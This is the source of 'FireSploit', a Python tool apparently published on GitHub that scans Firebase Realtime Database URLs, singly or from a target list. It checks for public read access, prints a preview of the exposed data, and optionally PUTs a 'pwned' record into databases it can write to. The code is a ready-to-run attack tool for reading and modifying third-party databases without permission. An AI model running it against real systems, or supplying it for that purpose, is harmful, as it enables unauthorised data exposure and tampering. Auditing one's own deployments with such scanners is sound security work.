FireSploit/firesploit.py at main · secshubhamsharma/FireSploit · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
#!/usr/bin/env python3

"""
FireSploit - Firebase Public Access Scanner

Author: Shubham Sharma
GitHub: https://github.com/secshubhamsharma/FireSploit
"""

import requests
import argparse
import json
from datetime import datetime
from typing import List
import sys


class Tee:
    def __init__(self, filename):
        self.file = open(filename, "w", encoding="utf-8")
        self.stdout = sys.stdout

    def write(self, data):
        self.file.write(data)
        self.stdout.write(data)

    def flush(self):
        self.file.flush()
        self.stdout.flush()

    def close(self):
        self.file.close()


def current_timestamp() -> str:
    return datetime.now().isoformat()


def check_public_read(database_url: str) -> bool:
    test_url = f"{database_url}/.json"
    print(f"\n[+] Checking public read access: {test_url}")
    print(f"[*] Scan started at: {current_timestamp()}")

    try:
        response = requests.get(test_url, timeout=5)
        if response.status_code == 200 and response.json():
            print("[!] Public read access detected.")
            preview = json.dumps(response.json(), indent=2)
            print("[*] Sample response:")
            print(preview[:500] + "...\n")
            return True
        else:
            print("[✓] No public read access.")
            return False
    except requests.exceptions.RequestException as error:
        print(f"[x] Connection error: {error}")
        return False


def try_public_write(database_url: str) -> None:
    payload_url = f"{database_url}/pwned.json"
    timestamp = current_timestamp()
    payload = {
        "pwned": True,
        "by": "FireSploit",
        "timestamp": timestamp
    }

    print(f"\n[+] Attempting public write access: {payload_url}")
    try:
        response = requests.put(payload_url, json=payload, timeout=5)
        if response.status_code == 200:
            print("[!] Public write access detected.")
            print("[*] Payload successfully written:")
            print(json.dumps(payload, indent=2))
        else:
            print(f"[✓] Write attempt rejected. Status code: {response.status_code}")
    except requests.exceptions.RequestException as error:
        print(f"[x] Connection error during write attempt: {error}")


def load_targets_from_file(file_path: str) -> List[str]:
    try:
        with open(file_path, "r") as f:
            return [line.strip() for line in f if line.strip()]
    except FileNotFoundError:
        print(f"File not found: {file_path}")
        return []


def parse_arguments():
    parser = argparse.ArgumentParser(
        description="FireSploit - Firebase public access vulnerability scanner"
    )
    parser.add_argument(
        "--url",
        help="Single Firebase DB URL (e.g., https://yourapp.firebaseio.com)"
    )
    parser.add_argument(
        "--file",
        help="Path to file containing Firebase URLs to scan (one per line)"
    )
    parser.add_argument(
        "-o", "--output",
        help="Save output to a specified file (e.g., save.txt)"
    )
    return parser.parse_args()


def main():
    args = parse_arguments()

    if args.output:
        sys.stdout = Tee(args.output)

    print("FireSploit Scanner v1.1")
    print(f"[*] Executed at: {current_timestamp()}")

    if args.file:
        targets = load_targets_from_file(args.file)
        print(f"[*] Loaded {len(targets)} targets from {args.file}")
        for idx, url in enumerate(targets, 1):
            print(f"\n--- [{idx}/{len(targets)}] Target: {url} ---")
            if check_public_read(url):
                choice = input("[?] Attempt write exploit? (y/N): ").strip().lower()
                if choice == "y":
                    try_public_write(url)
    elif args.url:
        if check_public_read(args.url.rstrip("/")):
            choice = input("Attempt write exploit? (y/N): ").strip().lower()
            if choice == "y":
                try_public_write(args.url.rstrip("/"))
    else:
        print("Error: You must provide either --url or --file")

    if args.output:
        sys.stdout.file.close()
        sys.stdout = sys.stdout.stdout


if __name__ == "__main__":
    main()